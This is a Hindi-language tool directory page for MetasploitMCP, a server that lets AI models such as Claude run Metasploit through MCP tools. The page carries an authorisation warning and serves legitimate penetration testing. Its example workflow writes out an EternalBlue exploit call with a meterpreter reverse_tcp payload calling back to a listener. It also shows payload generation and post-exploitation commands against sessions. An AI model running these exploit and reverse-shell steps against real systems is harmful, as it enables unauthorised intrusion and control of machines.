Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MetasploitMCP — Metasploit के लिए MCP सर्वर | Kitploit
उपकरण/GitHubGitHub/gh05tcrew/metasploitmcp
भेद्यता परीक्षण फ्रेमवर्कशोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलशेलकोड जनरेशन
707200547 महीने पहलेKitploit द्वारा समीक्षित
GitHub
gh05tcrew/metasploitmcp

MetasploitMCP

Metasploit के लिए MCP सर्वर

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

मेटास्प्लॉइट MCP सर्वर

मेटास्प्लॉइट फ्रेमवर्क एकीकरण के लिए एक मॉडल कॉन्टेक्स्ट प्रोटोकॉल (MCP) सर्वर।

https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1

विवरण

यह MCP सर्वर Claude जैसे बड़े भाषा मॉडल और मेटास्प्लॉइट फ्रेमवर्क पेनिट्रेशन टेस्टिंग प्लेटफ़ॉर्म के बीच एक पुल प्रदान करता है। यह AI सहायकों को मानकीकृत टूल के माध्यम से मेटास्प्लॉइट कार्यक्षमता तक गतिशील रूप से पहुँचने और नियंत्रित करने की अनुमति देता है, जिससे जटिल सुरक्षा परीक्षण वर्कफ़्लो के लिए एक प्राकृतिक भाषा इंटरफ़ेस सक्षम होता है।

विशेषताएँ

मॉड्यूल जानकारी

  • list_exploits: उपलब्ध मेटास्प्लॉइट एक्सप्लॉइट मॉड्यूल खोजें और सूचीबद्ध करें
  • list_payloads: उपलब्ध मेटास्प्लॉइट पेलोड मॉड्यूल को वैकल्पिक प्लेटफ़ॉर्म और आर्किटेक्चर फ़िल्टरिंग के साथ खोजें और सूचीबद्ध करें

एक्सप्लॉइटेशन वर्कफ़्लो

  • run_exploit: पहले जाँच चलाने के विकल्पों के साथ लक्ष्य के विरुद्ध एक एक्सप्लॉइट कॉन्फ़िगर और निष्पादित करें
  • run_auxiliary_module: कस्टम विकल्पों के साथ कोई भी मेटास्प्लॉइट ऑक्सिलियरी मॉड्यूल चलाएं
  • run_post_module: मौजूदा सत्रों के विरुद्ध पोस्ट-एक्सप्लॉइटेशन मॉड्यूल निष्पादित करें

पेलोड जनरेशन

  • generate_payload: मेटास्प्लॉइट RPC का उपयोग करके पेलोड फ़ाइलें जनरेट करें (फ़ाइलों को स्थानीय रूप से सहेजता है)

सत्र प्रबंधन

  • list_active_sessions: विस्तृत जानकारी के साथ वर्तमान मेटास्प्लॉइट सत्र दिखाएं
  • send_session_command: सक्रिय शेल या Meterpreter सत्र में एक कमांड चलाएं
  • terminate_session: सक्रिय सत्र को जबरन समाप्त करें

हैंडलर प्रबंधन

  • list_listeners: सभी सक्रिय हैंडलर और बैकग्राउंड जॉब दिखाएं
  • start_listener: कनेक्शन प्राप्त करने के लिए एक नया multi/handler बनाएं
  • stop_job: किसी भी चल रहे जॉब या हैंडलर को समाप्त करें

पूर्वापेक्षाएँ

  • मेटास्प्लॉइट फ्रेमवर्क स्थापित हो और msfrpcd चल रहा हो
  • Python 3.10 या उच्चतर
  • आवश्यक Python पैकेज (requirements.txt देखें)

स्थापना

  1. इस रिपॉजिटरी को क्लोन करें
  2. निर्भरताएँ स्थापित करें:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. पर्यावरण चर कॉन्फ़िगर करें (वैकल्पिक):
    root@kitploit:~
    MSF_PASSWORD=yourpassword
    MSF_SERVER=127.0.0.1
    MSF_PORT=55553
    MSF_SSL=false
    PAYLOAD_SAVE_DIR=/path/to/save/payloads  # Optional: Where to save generated payloads
    

उपयोग

मेटास्प्लॉइट RPC सेवा प्रारंभ करें:

root@kitploit:~
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553

ट्रांसपोर्ट विकल्प

सर्वर दो ट्रांसपोर्ट विधियों का समर्थन करता है:

  • HTTP/SSE (सर्वर-सेंट इवेंट): अधिकांश MCP क्लाइंट के साथ इंटरऑपरेबिलिटी के लिए डिफ़ॉल्ट मोड
  • STDIO (स्टैंडर्ड इनपुट/आउटपुट): Claude Desktop और समान डायरेक्ट पाइप कनेक्शन के साथ उपयोग किया जाता है

आप --transport फ़्लैग का उपयोग करके ट्रांसपोर्ट मोड स्पष्ट रूप से चुन सकते हैं:

root@kitploit:~
# Run with HTTP/SSE transport (default)
python MetasploitMCP.py --transport http

# Run with STDIO transport
python MetasploitMCP.py --transport stdio

HTTP मोड के लिए अतिरिक्त विकल्प:

root@kitploit:~
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085

Claude Desktop एकीकरण

Claude Desktop एकीकरण के लिए, claude_desktop_config.json कॉन्फ़िगर करें:

root@kitploit:~
{
    "mcpServers": {
        "metasploit": {
            "command": "uv",
            "args": [
                "--directory",
                "C:\\path\\to\\MetasploitMCP",
                "run",
                "MetasploitMCP.py",
                "--transport",
                "stdio"
            ],
            "env": {
                "MSF_PASSWORD": "yourpassword"
            }
        }
    }
}

अन्य MCP क्लाइंट

HTTP/SSE का उपयोग करने वाले अन्य MCP क्लाइंट के लिए:

  1. सर्वर को HTTP मोड में प्रारंभ करें:

    root@kitploit:~
    python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
    
  2. अपने MCP क्लाइंट को निम्न से कनेक्ट करने के लिए कॉन्फ़िगर करें:

    • SSE endpoint: http://your-server-ip:8085/sse

सुरक्षा संबंधी विचार

⚠️ महत्वपूर्ण सुरक्षा चेतावनी:

यह उपकरण मेटास्प्लॉइट फ्रेमवर्क क्षमताओं तक सीधी पहुँच प्रदान करता है, जिसमें शक्तिशाली एक्सप्लॉइटेशन सुविधाएँ शामिल हैं। जिम्मेदारी से उपयोग करें और केवल उन वातावरणों में जहाँ आपके पास सुरक्षा परीक्षण करने की स्पष्ट अनुमति हो।

  • हमेशा निष्पादन से पहले सभी कमांड को मान्य और समीक्षा करें
  • केवल पृथक परीक्षण वातावरण में या उचित प्राधिकरण के साथ चलाएं
  • ध्यान रखें कि पोस्ट-एक्सप्लॉइटेशन कमांड महत्वपूर्ण सिस्टम संशोधनों का परिणाम हो सकते हैं

उदाहरण वर्कफ़्लो

बुनियादी एक्सप्लॉइटेशन

  1. उपलब्ध एक्सप्लॉइट सूचीबद्ध करें: list_exploits("ms17_010")
  2. एक एक्सप्लॉइट चुनें और चलाएं: run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})
  3. सत्र सूचीबद्ध करें: list_active_sessions()
  4. कमांड चलाएं: send_session_command(1, "whoami")

पोस्ट-एक्सप्लॉइटेशन

  1. पोस्ट मॉड्यूल चलाएं: run_post_module("windows/gather/enum_logged_on_users", 1)
  2. कस्टम कमांड भेजें: send_session_command(1, "sysinfo")
  3. हो जाने पर समाप्त करें: terminate_session(1)

हैंडलर प्रबंधन

  1. एक लिसनर प्रारंभ करें: start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)
  2. सक्रिय हैंडलर सूचीबद्ध करें: list_listeners()
  3. पेलोड जनरेट करें: generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})
  4. हैंडलर रोकें: stop_job(1)

परीक्षण

इस प्रोजेक्ट में विश्वसनीयता और रखरखाव सुनिश्चित करने के लिए व्यापक यूनिट और इंटीग्रेशन परीक्षण शामिल हैं।

परीक्षण के लिए पूर्वापेक्षाएँ

परीक्षण निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements-test.txt

या सुविधाजनक इंस्टालर का उपयोग करें:

root@kitploit:~
python run_tests.py --install-deps
# OR
make install-deps

परीक्षण चलाना

त्वरित कमांड

root@kitploit:~
# Run all tests
python run_tests.py --all
# OR
make test

# Run with coverage report
python run_tests.py --all --coverage
# OR
make coverage

# Run with HTML coverage report
python run_tests.py --all --coverage --html
# OR
make coverage-html

विशिष्ट परीक्षण सूट

root@kitploit:~
# Unit tests only
python run_tests.py --unit
# OR
make test-unit

# Integration tests only  
python run_tests.py --integration
# OR
make test-integration

# Options parsing tests
python run_tests.py --options
# OR
make test-options

# Helper function tests
python run_tests.py --helpers
# OR
make test-helpers

# MCP tools tests
python run_tests.py --tools
# OR
make test-tools

परीक्षण विकल्प

root@kitploit:~
# Include slow tests
python run_tests.py --all --slow

# Include network tests (requires actual network)
python run_tests.py --all --network

# Verbose output
python run_tests.py --all --verbose

# Quick test (no coverage, fail fast)
make quick-test

# Debug mode (detailed failure info)
make test-debug

परीक्षण संरचना

  • tests/test_options_parsing.py: विकल्प पार्सिंग कार्यक्षमता के लिए यूनिट परीक्षण
  • tests/test_helpers.py: आंतरिक सहायक फ़ंक्शन और MSF क्लाइंट प्रबंधन के लिए यूनिट परीक्षण
  • tests/test_tools_integration.py: मॉक किए गए मेटास्प्लॉइट बैकएंड के साथ सभी MCP टूल के लिए इंटीग्रेशन परीक्षण
  • conftest.py: साझा परीक्षण फिक्स्चर और कॉन्फ़िगरेशन
  • pytest.ini: कवरेज सेटिंग्स के साथ Pytest कॉन्फ़िगरेशन

परीक्षण सुविधाएँ

  • व्यापक मॉकिंग: सभी मेटास्प्लॉइट निर्भरताओं को मॉक किया गया है, इसलिए परीक्षण वास्तविक MSF इंस्टॉलेशन की आवश्यकता के बिना चलते हैं
  • Async समर्थन: pytest-asyncio का उपयोग करके पूर्ण async/await परीक्षण समर्थन
  • कवरेज रिपोर्टिंग: HTML रिपोर्ट के साथ विस्तृत कवरेज विश्लेषण
  • पैरामीट्रीकृत परीक्षण: कई इनपुट परिदृश्यों का कुशल परीक्षण
  • फिक्स्चर प्रबंधन: सामान्य सेटअप परिदृश्यों के लिए पुन: उपयोग योग्य परीक्षण फिक्स्चर

कवरेज रिपोर्ट

कवरेज के साथ परीक्षण चलाने के बाद, रिपोर्ट यहां उपलब्ध हैं:

  • टर्मिनल: परीक्षण चलने के बाद कवरेज सारांश प्रदर्शित होता है
  • HTML: htmlcov/index.html (--html विकल्प का उपयोग करने पर)

CI/CD एकीकरण

निरंतर एकीकरण के लिए:

root@kitploit:~
# CI-friendly test command
make ci-test
# OR
python run_tests.py --all --coverage --verbose

कॉन्फ़िगरेशन विकल्प

पेलोड सेव निर्देशिका

डिफ़ॉल्ट रूप से, generate_payload के साथ जनरेट किए गए पेलोड आपके होम फ़ोल्डर में payloads निर्देशिका (~/payloads या C:\Users\YourUsername\payloads) में सहेजे जाते हैं। आप PAYLOAD_SAVE_DIR पर्यावरण चर सेट करके इस स्थान को अनुकूलित कर सकते हैं।

पर्यावरण चर सेट करना:

  • Windows (PowerShell):

    root@kitploit:~
    $env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"
    
  • Windows (Command Prompt):

    root@kitploit:~
    set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads
    
  • Linux/macOS:

    root@kitploit:~
    export PAYLOAD_SAVE_DIR=/custom/path/to/payloads
    
  • Claude Desktop कॉन्फ़िग में:

    root@kitploit:~
    "env": {
        "MSF_PASSWORD": "yourpassword",
        "PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads"  // Only add if you want to override the default
    }
    

नोट: यदि आप कोई कस्टम पथ निर्दिष्ट करते हैं, तो सुनिश्चित करें कि वह मौजूद है या एप्लिकेशन के पास उसे बनाने की अनुमति है। यदि पथ अमान्य है, तो पेलोड जनरेशन विफल हो सकता है।

लाइसेंस

Apache 2.0

टूल डाउनलोड करें